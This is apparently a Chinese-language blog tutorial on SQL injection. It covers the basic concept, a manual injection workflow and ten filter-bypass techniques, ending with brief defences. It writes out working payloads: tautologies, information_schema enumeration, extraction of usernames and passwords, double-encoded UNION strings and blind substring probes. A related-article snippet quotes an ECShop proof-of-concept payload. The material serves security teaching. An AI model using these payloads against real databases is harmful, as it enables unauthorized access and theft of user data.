SQL注入漏洞分析

最新推荐文章于 2024-10-17 20:40:27 发布
最新推荐文章于 2024-10-17 20:40:27 发布
阅读量276 收藏 1
点赞数 9
分类专栏: OWTOP10 文章标签: sql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wudideaqing/article/details/139284193
版权

基本概念及原理

一、什么是SQL注入

攻击者通常会在输入字段中插入恶意SQL代码,利用程序在处理用户输入时的漏洞,执行未授权的数据库操作,这样可以获取,修改或删除数据库中的数据

二、SQL注入的危害

SQL注入的危害包括数据泄露、数据篡改、身份冒充、拒绝服务、权限提升等

三、前提条件

输入的参数用户可以控制

拼接语句字段可以带入到数据库查询

常见的攻击方式

一、手工注入基本流程

1、识别注入点

利用单引号等特殊字符,观察是否有SQL错误信息

2、验证注入点

利用特定的语句验证注入点是否可用

‘1’ = ‘1

3、确定数据库类型

利用特定的查询语句来识别数据库类型

SELECT @@version;

4、开始收集信息

获取数据库名

SELECT database();

获取表名

SELECT table_name FROM information_schema.tables;

获取列名

SELECT column_name FROM information_schema.columns WHERE table_name='users';

5、提取数据

SELECT username, password FROM users;

6、根据需求进行下一步操作

二、SQL注入常见绕过技术(Bypass技术)

1、评论符绕过

' OR '1'='1'--

2、大小写混合绕过

select * from users where id=1 UNION SELECT 1,2,3,4;
select * from users where id=1 UniON SelECT 1,2,3,4;

3、空格字符绕过

select * from users where id=1 /*!union*//*!select*/1,2,3,4;

4、二次编码绕过

1 union select 1,2,3,4#

第一次编码
%2d%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%23
第二次编码
%25%32%64%25%33%31%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%33%33%25%32%63%25%33%34%25%32%33

5、使用浮点数绕过

select * from users where id=8E0union select 1,2,3,4;
select * from users where id=8.0union select 1,2,3,4

6、去重复绕过

select * from users where id=-1 union distinct select 1,2,3,4 from users;

7、等号绕过

select * from users where id=1 and ascii(substring(user(),1,1))<115;

8、使用生僻函数绕过

select polygon((select * from (select * from (select @@version) f) x));

9、联合查询绕过

SELECT * FROM (SELECT id, name FROM users WHERE age > 18) AS adult_users WHERE name LIKE 'A%';

10、ascii字符对比绕过

select * from users where id=1 and substring(user(),1,1)='r';
select * from users where id=1 and ascii(substring(user(),1,1))=114;

三、防御措施

1、对数据库的内容进行转义处理

2、数据长度应该严格控制

3、避免网站显示SQL错误信息

4、数据库编码统一使用UTF-8编码

5、严格限制网站用户的数据库操作权限

Body game
关注
专栏目录
SQL 注入漏洞详解
Toasten
07-23 1847
SQL 注入即是指 Web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 Web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询从而进一步得到相应的数据信息。
SQL注入漏洞详解
m0_56822024的博客
07-08 9386
SQL注入漏洞主要形成的原因是Web应用程序对用户的输入没有做严格的判断,导致用户可用将非法的SQL语句拼接到正常的语句中,被当作SQL语句的一部分执行。
SQL注入漏洞代码分析
m0_74025111的博客
04-23 965
按照所传递的数据类型分类: 数字型注入 SELECT first_name, last_name FROM users WHERE user_id= id字符型注入SELECTfirstn​ame,lastn​ameFROMusersWHEREuseri​d=′id‘ 无论何种类型,都可以通过直接输入单引号来判断是否存在注入点。对于字符型注入,对用于接收用户参数的变量,用mysql_real_escape_string()、addslashes()等函数进行过滤。代码层面 1.对输入进行严格的转义和过滤;
sql注入漏洞分析
yangbz123的博客
06-20 827
SQL注入是什么 sql注入是指利用sql语句,通过web向数据库提交sql语句不正当在未授权的情况下获取数据,sql注入曾被OWASP组织评为十大漏洞之首,可见sql注入漏洞的危害。 SQL注入分为那几种 数字型和字符型 数字型一般不需要闭合。 字符型一般需要闭合。 闭合方式: 单引号闭合:’ 双引号闭合:" 单括号闭合:) 双括号闭合:)) 单引括号闭合:’) 双引括号闭合:") 等。。。。。 数字型注入演示 ?id=1 回显正常 ?id=1’报错 查询过程 select * from table wh
ECSHOP 2.7.x sql注入漏洞分析
weixin_43263451的博客
04-16 3409
ecshop将我们可控的参数渲染进模板时,其中利用到$fun($para) 进行动态调用,而通过精心构造的payload使得$fun和$para我们可控,导致可以调用任何函数,从而达到sql注入 1. POC与复现 POC: Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:1:"1";s:2:"id";s:52:"1' and updatexml(0x7e,concat(0x7e,database()),0x7e)#";} 复现
sql注入漏洞详解
qq_39511050的博客
09-17 1531
sql注入漏洞详解
SQL注入漏洞检测
Kali与编程
12-10 1482
SQL注入漏洞是一种常见的安全漏洞,渗透测试工程师需要掌握SQL注入漏洞的检测技术,以便在测试中及时发现和利用漏洞。常见的注入点包括GET参数、POST参数、Cookie、HTTP头部信息和用户名密码等,常见的注入方式包括基于错误的注入、基于联合查询的注入、基于布尔盲注的注入、基于时间盲注的注入和基于报错盲注的注入等。本文将从渗透测试工程师的角度,详细介绍SQL注入漏洞的检测基础,包括常见的注入点、注入方式、手工注入和自动化注入等。常见的SQL注入技术包括基于错误的注入、基于时间的注入、联合查询注入等。
CVE-2024-24112 XMall后台管理系统 SQL 注入漏洞分析
shelter1234567的博客
03-18 1218
XMall后台管理系统 SQL 注入漏洞分析
sql注入详解
热门推荐
内心不种满鲜花就会长满杂草
05-05 21万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
tp3.2.3sql注入漏洞分析
qq_53856457的博客
05-18 1981
thinkphp3.2.3 sql注入漏洞分析 文章目录thinkphp3.2.3 sql注入漏洞分析thinkphp3.2.3 where注入环境配置数据库配置控制器payload:过程分析ThinkPHP3.2.3_bind注入1. 环境2. payload3. 过程分析thinkphp 3.2.3 exp注入1.环境2.payload:3. 过程分析**补充:**1.为什么I()方法能阻止sql注入?2.parseWhereItem方法设计缺陷3.漏洞代码中的where方法为什么要是数组的形式 先到t
Discuz7.2版的faq.php SQL注入漏洞分析
10-25
通过以上的分析和修复建议,可以帮助开发者更好地了解和防范SQL注入漏洞,从而提高Web应用程序的安全性。对于任何Web开发人员或安全研究人员来说,了解这类常见漏洞的原理和防护方法都是至关重要的。
SQL注入漏洞分析与防范.pdf
09-19
总结以上内容,SQL注入漏洞分析与防范需要网站开发者从多个层面出发,包括但不限于代码安全的编写、系统防护措施的实施以及对相关人员的安全培训。通过这些综合性的措施,可以大幅提高网站的安全性,防止因SQL注入...
SQL注入漏洞全接触.ppt
11-15
六、 SQL注入漏洞的案例分析 * 例如,在网站首页上,有名为“IE不能打开新窗口的多种解决方法”的链接,地址为:,我们在这个地址后面加上单引号’,服务器会返回下面的错误提示:Microsoft JET Database Engine ...
Web应用SQL注入漏洞分析及防御研究.pdf
09-19
Web应用SQL注入漏洞分析及防御研究.pdf
使用LLM和RAG进行数据库查询(文本到SQL)的四大挑战及解决方案
python1234_的博客
10-16 964
WrenAI是您与数据的自然语言接口WrenAI是您与数据的自然语言接口WrenAI是开源的。您可以在您的数据、LLM API和环境中的任何地方部署WrenAI。它带有直观的入门和用户界面,允许您在几分钟内连接和建模数据源中的数据模型。在WrenAI的底层,开发了一个名为“Wren Engine”的框架——LLM的语义层。Wren Engine也在GitHub上开源。
【力扣 | SQL题 | 每日4题】力扣1164,3293,1308,1270
2301_80912559的博客
10-17 1005
4 mid,四题都比较简单,没什么难度。
Spring MessageSource国际化原理
最新发布
xsgnzb的专栏
10-17 974
查找code的过程。遍历basenames找到对应的资源文件// 没有变量的情况if (bundle!= null) {// 有变量的情况,使用MessageFormat对变量进行替换if (bundle!= null) {= null) {获得ResourceBundle= null) {try {// ...
mysql学习教程,从入门到精通,sql序列使用(45)
qq_45746668的博客
10-16 408
SQL中,序列(Sequence)是一种数据库对象,用于生成唯一的数值,通常用于自动递增的主键。不同的数据库管理系统(DBMS)对序列的支持和语法可能有所不同。以下是一些常见的DBMS(如Oracle、PostgreSQL和MySQL)中如何使用序列的示例。
sql server删除过期备份文件脚本
Winter_Sun灬的博客
10-14 455
删除sql server数据库备份文件脚本
PHP168 SQL注入漏洞分析与利用
sqlmap是一个用于检测和利用SQL注入漏洞的开源Python工具。通过指定URL、后缀(`--suffix`)、篡改器(`--tamper`)如`chardoubleencode.py`以及探测级别(`--level3`),sqlmap成功地识别出了数据库的存在。为了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值